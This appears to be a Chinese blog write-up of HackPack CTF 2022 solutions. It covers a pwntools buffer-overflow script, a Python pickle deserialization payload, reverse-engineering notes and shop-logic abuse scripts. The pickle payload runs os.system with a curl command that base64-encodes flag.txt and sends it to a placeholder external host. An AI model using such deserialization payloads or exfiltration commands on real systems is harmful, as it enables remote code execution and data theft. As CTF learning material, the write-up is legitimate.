HackPack CTF 2022 WriteUp

已于 2022-04-11 08:42:21 修改
阅读量945 收藏
点赞数
文章标签: ctf hackpack writeup
于 2022-04-09 23:05:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wdearzh/article/details/124070193
版权

文章目录

pwn-Terminal Overdrive

# -*- coding: utf-8 -*-
from pwn import *
r = remote('cha.hackpack.club',10991)
fpath = '/mnt/d/ctf/ti/hackpackctf2022/pwn/chal'
#r = process(fpath)
elf=ELF(fpath)
 
off=0x36+4+4
payload=b'a'*off+p32(1)
r.sendline(payload)
 
r.interactive()

web-Imported Kimchi 1

Pickle反序列化

# coding=utf8
import pickle
import os
class payload(object):
    def __reduce__(self):
        #被调用函数的参数
        cmd = "curl xxx.xx.xxx.xx:xxx/`cat flag.txt|base64`"
        return (os.system,(cmd,))
a = payload()
ser = pickle.dumps(a)
print(ser)
 
with open("payload.jpg",'wb') as f:
    f.write(ser)
#pickle.loads(open('payload.jpg','rb').read())

web-Imported Kimchi 2

同上

rev-3T PHON3 HOM3

apk,jadx翻一番value.xml里有flag

全局搜索flag{也能在资源中找到

rev-Self-Hosted Crypto

  if ( (unsigned __int64)&retaddr <= *(_QWORD *)(v1 + 16) )
    runtime_morestack_noctxt_abi0();
  if ( (unsigned __int64)qword_4E6AD8 <= 1 )
LABEL_9:
    runtime_panicIndex();
  v2 = *(_QWORD *)(os_Args + 24);
  File = os_ReadFile();
  if ( v0 )
  {
    runtime_gopanic(); //这里面没啥用
    goto LABEL_9;
  }
  v7 = File;
  runtime_makeslice();
  v5 = v2;
  for ( i = 0LL; v5 > i; ++i )
    *(_BYTE *)(v4 + i) = *(_BYTE *)(v7 + i) + 13;  //这是是算法
  os_WriteFile();

exp:

with open('encrypted_','rb') as f:
    d = f.read()
flag=''
for i in d:
    flag += chr(i-13)
print(flag)

rev-Shopkeeper 1

nc连接之后,显示的base64解一下,是个elf文件,ida中发现flag

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char command[56]; // [rsp+0h] [rbp-40h] BYREF
  const char *v5; // [rsp+38h] [rbp-8h]
 
  strcpy(command, "base64 chal");
  system(command);
  v5 = "flag{b4s364_1s_s0_c3wl_wh0_kn3w_you_c0u1d_do_th15}";
  if ( (unsigned __int8)print_flag_1() )
    print_flag_2();
  return 0;
}

rev-Shopkeeper 2

同上的elf文件,需要通过print_flag_1获取服务器本地的flag

__int64 print_flag_1()
{
  FILE *stream; // [rsp+0h] [rbp-10h]
  char i; // [rsp+Fh] [rbp-1h]
 
  if ( !(unsigned __int8)Level1() ) //需要Level1 返回0
    return 0LL;
  stream = fopen("flag-1.txt", "r");
  if ( !stream )
  {
    puts("Cannot open file ");
    fflush(stdout);
    exit(0);
  }
  for ( i = fgetc(stream); i != -1; i = fgetc(stream) )
    putchar(i);
  fclose(stream);
  putchar(10);
  fflush(stdout);
  return 1LL;
}

Buy处理时可以为负数

fprintf(stdout, "How many %s would you like to buy?\n", (const char *)v4[v11]);
fflush(stdout);
v10 = getchar() - 48;
getchar();
if ( (unsigned __int8)coins >= v10 * v3[v11] )
{
    coins -= v10 * v3[v11];
    *(&v5 + v11) += v10;
}

所以步骤为 Buy,选择2,输入回车、回车,然后buy flag,然后查看flag即可。

rev-Shopkeeper 3

# -*- coding: utf-8 -*-
from pwn import *
r = remote('cha.hackpack.club',10992)
r.sendline("1")
r.sendline("2")
r.sendline("\x1d")
 
r.sendline("1")
r.sendline("1")
r.sendline("3")
 
r.sendline("2")
r.sendline("1")
r.sendline("1")
 
r.sendline("1")
r.sendline("3")
r.sendline("1")
r.sendline("3")
 
##level 2
#  55 - 19 = 36
#  48 + 18 = 66 \x42
c=0
for i in range(100):
    r.sendafter('How much money do you want to bet?\n', "\x42")
    r.sendafter('What is the value? (0-9)\n', "1")
    t = r.recvline()
    print(t)
    if t[:8] == b'Correct!':
        print("ok1")
        c +=1
        if c == 2:
            break
r.interactive()
丶拾光_w4ngz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
SHELL CTF 2022题目及wp
Laffrey的专栏
08-16 387
https://gitcode.net/rickliuxiao/shellctf2022 SHELLCTF2022 真题及wp。
2023第五届 Real World CTF 体验赛 Writeup(web)
一只爱吃橙子的羊
01-12 2532
2023第五届 Real World CTF 体验赛 Writeup(web)
探索解谜之旅:CTF-write-ups 全面解析
最新发布
gitblog_00068的博客
06-02 297
探索解谜之旅:CTF-write-ups 全面解析 项目地址:https://gitcode.com/pcw109550/write-up 如果你对信息安全挑战赛(Capture The Flag,简称CTF)中的加密和区块链问题有浓厚兴趣,那么这个开源项目——CTF write-ups 将是你不容错过的宝藏。这里详尽记录了一系列由作者亲身参与并解决的难题,涉及多种尖端技术和算法应用。 项目介绍 ...
HackPack CTF
njh18790816639的博客
04-21 223
BF means best friend, right? 这个先放上代码! --[----->+<]>----[-<+>]+[--------->++<]>[-<+>]--[----->+<]>-----[-<+>]+[----->+++<]>++[-<+>]+[------->++<]>[-<+>]++[------>+<]>++[-&lt
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
imaginary ctf 2022 writeups
08-07
imaginary ctf 2022 writeups
CTF-writeup
03-19
在这个CTF-writeup中,我们将主要探讨与JavaScript相关的知识点,这是一种广泛用于Web开发的编程语言,也是CTF比赛中的常见挑战类型。 JavaScript是互联网上动态内容的基础,它允许网页与用户进行交互,执行实时...
阿里云ctf比赛writeup
04-26
阿里云CTF比赛Writeup详解 在网络安全领域,Capture The Flag(CTF)是一种常见的竞赛形式,参赛者通过解决各种安全挑战来展示他们的技术能力。阿里云CTF比赛提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(初赛)
ZXW_NUDT的博客
07-11 3527
第六届”蓝帽杯“全国大学生网络安全技能大赛
CTF_论剑场 misc杂项 WriteUp(持续更新)
qq_41995976的博客
05-19 9758
签到题 提交这里的flag即可 Snake 开始游戏要先注册 登录后发现是一个贪吃蛇游戏 并且题干里说要攒够500分就可获得flag 一开始思路是逆向工程 然后找flag 但是根据经验( 并且电脑里正好有CE 就使用CE来改分数了 但是发现改了分数之后的flag为乱码…… 于是又搞了一会儿 发现是长度的问题…… 于是把长度和分数一起修改: 成功获得了flag 之后的再做了之后更新 ...
2022赣政杯CTF---Writeup
3tefanie丶zhou的博客
08-23 2144
【喜欢一个女子时,岂敢不真心,岂敢不用心。】
[ CTF ]【天格】战队WriteUp-第七届“强网杯”全国安全挑战赛
ZXW_NUDT的博客
12-18 3238
第七届“强网杯”全国安全挑战赛
CTFWriteup】2020金融密码杯
zhyjie2008的博客
01-26 1097
Mathematical 50分 小张是某金融科技公司的运维人员,最近遇到了一件烦心事,自己维护的服务器明文密码忘记了,但是找到了明文对应密文的加密算法,通过分析以下脚本,你能帮小张找回服务器密码吗?答案请用flag{密码}表示,例如flag{pass1234}。 from crypto.Util import number from gmpy2 import * from secret import flag e = 65537 p = number.getPrime(2020) q = num
ctf攻防世界练习题writeup(第一部分)
Ohh24的博客
09-01 1026
view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 用火狐浏览器打开对应网站 发现无法找到对应的flag,此时可以按F12寻找相应的flag 同时,根据题目的提示,也可以搜索view-source:http://相应的网站/进行访问,寻找flag get_post 先用火狐打开相应的网站搜索 根据提示用get方式提交名为a,值为1的变量,...
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 4443
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
D3CTF2022: Java序列化漏洞利用与rome链优化
D3CTF2022-官方WriteUp1主要聚焦于网络安全领域,特别是数据库相关的渗透挑战。本次比赛中的题目涉及到MySQL的用户定义函数(UDF)提权技术,通过分析一个名为Webshorter的挑战,参与者被要求利用CVE-2022-24663漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丶拾光_w4ngz

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值